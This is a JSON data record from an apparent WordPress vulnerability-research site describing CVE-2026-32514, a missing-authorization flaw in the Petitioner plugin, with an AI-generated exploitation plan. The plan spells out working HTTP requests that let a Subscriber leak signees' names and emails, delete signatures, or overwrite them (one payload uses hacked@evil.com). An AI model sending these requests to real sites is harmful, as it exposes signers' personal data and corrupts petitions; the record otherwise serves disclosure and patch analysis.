[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fE9iu7JVDCfpa99DfuTBxUZyn5_zCb_qOa3jrJzgSyCc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-32514","petitioner-missing-authorization","Petitioner \u003C= 0.7.3 - Missing Authorization","The Petitioner plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 0.7.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.","petitioner",null,"\u003C=0.7.3","0.7.4","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-27 00:00:00","2026-03-27 18:39:31",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ffc707604-b2ce-4925-b3aa-eeb850543ca1?source=api-prod",1,[22,23,24,25,26,27,28,29],"dist\u002Fadmin-legacy.js","dist\u002Fadmin.js","inc\u002Fclass-setup.php","inc\u002Fsubmissions\u002Fclass-submissions-controller.php","package.json","petitioner.php","readme.txt","src\u002Fjs\u002Fadmin\u002Fsections\u002FEditFields\u002FSubmissions\u002FApprovalStatus\u002FResendButton.tsx","researched",false,3,"This research plan outlines the technical steps required to exploit a Missing Authorization vulnerability in the Petitioner plugin (versions up to 0.7.3).\n\n### 1. Vulnerability Summary\nThe Petitioner plugin registers several AJAX actions for managing petition submissions (fetching, updating, deleting, and status changes) using the `wp_ajax_` prefix in `inc\u002Fclass-setup.php`. While these actions are restricted to authenticated users, the corresponding handler functions in `AV_Petitioner_Submissions_Controller` (in `inc\u002Fsubmissions\u002Fclass-submissions-controller.php`) fail to perform capability checks (e.g., `current_user_can('manage_options')`). \n\nAdditionally, frontend source code (e.g., `src\u002Fjs\u002Fadmin\u002Fsections\u002FEditFields\u002FSubmissions\u002FApprovalStatus\u002FResendButton.tsx`) reveals that these endpoints do not implement WordPress nonces for CSRF protection, allowing any logged-in user (starting from the Subscriber role) to manipulate or delete petition signatures.\n\n### 2. Attack Vector Analysis\n*   **Endpoints:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Actions:** \n    *   `petitioner_delete_submission` (Primary Target)\n    *   `petitioner_fetch_submissions` (PII Leakage)\n    *   `petitioner_change_status`\n    *   `petitioner_update_submission`\n*   **Method:** `POST`\n*   **Authentication:** Required (Subscriber-level access).\n*   **Parameters:** \n    *   `id`: The integer ID of the submission to delete\u002Fupdate.\n    *   `form_id`: Used in `petitioner_fetch_submissions` to list entries.\n\n### 3. Code Flow\n1.  **Registration:** In `inc\u002Fclass-setup.php`, the plugin hooks AJAX actions:\n    `add_action('wp_ajax_petitioner_delete_submission', ['AV_Petitioner_Submissions_Controller', 'api_delete_form_submission']);`\n2.  **Request Entry:** An authenticated user sends a POST request to `admin-ajax.php?action=petitioner_delete_submission`.\n3.  **Missing Check:** The `AV_Petitioner_Submissions_Controller::api_delete_form_submission` method is invoked. It lacks a `current_user_can()` check or a `check_ajax_referer()` call.\n4.  **Sink:** The controller calls `AV_Petitioner_Submissions_Model::delete_submission($id)`, which executes a database deletion.\n\n### 4. Nonce Acquisition Strategy\nBased on the provided source file `src\u002Fjs\u002Fadmin\u002Fsections\u002FEditFields\u002FSubmissions\u002FApprovalStatus\u002FResendButton.tsx`, the admin-facing AJAX handlers **do not require nonces**. The `fetch` calls in the React components pass only the submission `id` and `action` without any `nonce` or `security` parameter.\n\n```javascript\n\u002F\u002F Verification from ResendButton.tsx\nconst response = await fetch(`${ajaxurl}?action=petitioner_resend_confirmation_email`, {\n    method: 'POST',\n    body: new URLSearchParams({ id: id.toString() }), \u002F\u002F No nonce present\n});\n```\nTherefore, a Subscriber-level attacker can trigger these actions directly as long as they provide a valid `id`.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Discover a Submission ID\nTo delete a submission, the attacker needs a valid submission `id`. They can leak all submissions (and their IDs) for a specific form using the vulnerable `petitioner_fetch_submissions` action.\n\n*   **Request:**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=petitioner_fetch_submissions&form_id=1\n    ```\n*   **Response:** A JSON object containing an array of signees, including their `id`, `email`, and `fname`.\n\n#### Step 2: Delete a Submission\nOnce an `id` is obtained (e.g., `id=42`), the attacker performs the unauthorized deletion.\n\n*   **Request:**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=petitioner_delete_submission&id=42\n    ```\n*   **Expected Response:** `{\"success\": true}`\n\n### 6. Test Data Setup\n1.  **Create Petition:** Create a new petition post via WP-CLI.\n    ```bash\n    wp post create --post_type=petitioner-petition --post_title=\"Save the Whales\" --post_status=publish\n    ```\n2.  **Generate Submission:** Use the public form submission action to create a test signature. (Requires a nonce, but we can bypass the public check by using WP-CLI to insert directly or by fetching the nonce from a page with the petition shortcode).\n    ```bash\n    # Alternative: Use WP-CLI to insert a row into the custom table directly\n    wp db query \"INSERT INTO wp_petitioner_submissions (form_id, email, fname, lname, approval_status) VALUES (1, 'victim@example.com', 'John', 'Doe', 'Confirmed')\"\n    ```\n3.  **Create Attacker:** Create a user with the Subscriber role.\n    ```bash\n    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123\n    ```\n\n### 7. Expected Results\n*   The `petitioner_fetch_submissions` request should return PII data (emails\u002Fnames) for all signees, even though the user is only a Subscriber.\n*   The `petitioner_delete_submission` request should return a success message.\n*   The targeted signature should be removed from the database.\n\n### 8. Verification Steps\nAfter running the exploit as a Subscriber, verify the deletion using WP-CLI:\n```bash\n# Check if the submission still exists in the database\nwp db query \"SELECT * FROM wp_petitioner_submissions WHERE email='victim@example.com'\"\n# Expected: Empty result\n```\n\n### 9. Alternative Approaches\nIf `petitioner_delete_submission` is not prioritized, target `petitioner_update_submission` to alter the names or emails of signees:\n*   **Payload:** `action=petitioner_update_submission&id=42&petitioner_email=hacked@evil.com&petitioner_fname=Hacked`\n*   **Reasoning:** Demonstrates unauthorized modification (Integrity violation).","The Petitioner plugin for WordPress (\u003C= 0.7.3) is vulnerable to unauthorized access and data manipulation due to missing authorization and nonce checks in several administrative AJAX handlers. This allow authenticated attackers, such as Subscribers, to fetch signee PII, update submission details, or delete petition signatures without administrative privileges.","\u002F\u002F inc\u002Fclass-setup.php lines 77-84\nadd_action('wp_ajax_petitioner_fetch_submissions', array('AV_Petitioner_Submissions_Controller', 'api_fetch_form_submissions'));\nadd_action('wp_ajax_petitioner_get_submissions', array('AV_Petitioner_Submissions_Controller', 'api_get_form_submissions'));\nadd_action('wp_ajax_nopriv_petitioner_get_submissions', array('AV_Petitioner_Submissions_Controller', 'api_get_form_submissions'));\nadd_action('wp_ajax_petitioner_change_status', array('AV_Petitioner_Submissions_Controller', 'api_change_submission_status'));\nadd_action('wp_ajax_petitioner_resend_confirmation_email', ['AV_Petitioner_Submissions_Controller', 'api_resend_confirmation_email']);\nadd_action('wp_ajax_petitioner_resend_all_confirmation_emails', ['AV_Petitioner_Submissions_Controller', 'api_resend_all_confirmation_emails']);\nadd_action('wp_ajax_petitioner_check_unconfirmed_count', ['AV_Petitioner_Submissions_Controller', 'api_check_unconfirmed_count']);\nadd_action('wp_ajax_petitioner_update_submission', ['AV_Petitioner_Submissions_Controller', 'api_update_form_submission']);\nadd_action('wp_ajax_petitioner_delete_submission', ['AV_Petitioner_Submissions_Controller', 'api_delete_form_submission']);\n\n---\n\n\u002F\u002F src\u002Fjs\u002Fadmin\u002Fsections\u002FEditFields\u002FSubmissions\u002FApprovalStatus\u002FResendButton.tsx lines 20-30\nconst response = await fetch(\n    `${ajaxurl}?action=petitioner_resend_confirmation_email`,\n    {\n        method: 'POST',\n        headers: {\n            'Content-Type':\n                'application\u002Fx-www-form-urlencoded; charset=UTF-8',\n        },\n        body: new URLSearchParams({\n            id: id.toString(),\n        }),\n    }\n);","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpetitioner\u002F0.7.3\u002Fdist\u002Fadmin.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpetitioner\u002F0.7.4\u002Fdist\u002Fadmin.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpetitioner\u002F0.7.3\u002Fdist\u002Fadmin.js\t2026-01-15 01:42:20.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpetitioner\u002F0.7.4\u002Fdist\u002Fadmin.js\t2026-02-16 17:39:04.000000000 +0000\n@@ -1,4 +1,4 @@\n-var ov=Object.freeze,Mk=Object.defineProperty;var fe=(e,t)=>ov(Mk(e,\"raw\",{value:ov(t||e.slice())}));import{s as Fk}from\".\u002Fassets\u002Futilities-Cs0l2Oez.js\";function F8(){import.meta.url,import(\"_\").catch(()=>1),async function*(){}().next()}function $k(e,t){for(var n=0;n\u003Ct.length;n++){const r=t[n];if(typeof r!=\"string\"&&!Array.isArray(r)){for(const o in r)if(o!==\"default\"&&!(o in e)){const i=Object.getOwnPropertyDescriptor(r,o);i&&Object.defineProperty(e,o,i.get?i:{enumerable:!0,get:()=>r[o]})}}}return Object.freeze(Object.defineProperty(e,Symbol.toStringTag,{value:\"Module\"}))}var zk=typeof globalThis\u003C\"u\"?globalThis:typeof window\u003C\"u\"?window:typeof global\u003C\"u\"?global:typeof self\u003C\"u\"?self:{};function ml(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,\"default\")?e.default:e}var Yb={exports:{}},$c={},Xb={exports:{}},be={};\u002F**\n+var ov=Object.freeze,Mk=Object.defineProperty;var fe=(e,t)=>ov(Mk(e,\"raw\",{value:ov(t||e.slice())}));import{s as Fk}from\".\u002Fassets\u002Futilities-Cs0l2Oez.js\";function F8(){import.meta.url,import(\"_\").catch(()=>1),async function*(){}().next()}function $k(e,t){for(var n=0;n\u003Ct.length;n++){const r=t[n];if(typeof r!=\"string\"&&!Array.isArray(r)){for(const o in r)if(o!==\"default\"&&!(o in e)){const i=Object.getOwnPropertyDescriptor(r,o);i&&Object.defineProperty(e,o,i.get?i:{enumerable:!0,get:()=>r[o]})}}}return Object.freeze(Object.defineProperty(e,Symbol.toStringTag,{value:\"Module\"}))}var zk=typeof globalThis\u003C\"u\"?globalThis:typeof window\u003C\"u\"?window:typeof global\u003C\"u\"?global:typeof self\u003C\"u\"?self:{};function hl(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,\"default\")?e.default:e}var Yb={exports:{}},zc={},Xb={exports:{}},be={};\u002F**\n... (truncated)","The exploit targets the administrative AJAX handlers that lack capability checks. An attacker must first authenticate as any user (e.g., Subscriber). 1. Data Leakage: The attacker sends a POST request to admin-ajax.php with the action 'petitioner_fetch_submissions' and a 'form_id'. The server responds with signee PII and submission IDs. 2. Data Modification\u002FDeletion: Using a leaked submission ID, the attacker sends a POST request to 'petitioner_delete_submission' or 'petitioner_update_submission' with the 'id' parameter. Because the controller fails to verify if the user has 'manage_options' capabilities or validate a nonce, the action is executed on the database.","gemini-3-flash-preview","2026-04-17 22:40:11","2026-04-17 22:40:45",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","0.7.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpetitioner\u002Ftags\u002F0.7.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpetitioner.0.7.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpetitioner\u002Ftags\u002F0.7.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpetitioner.0.7.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpetitioner\u002Ftags"]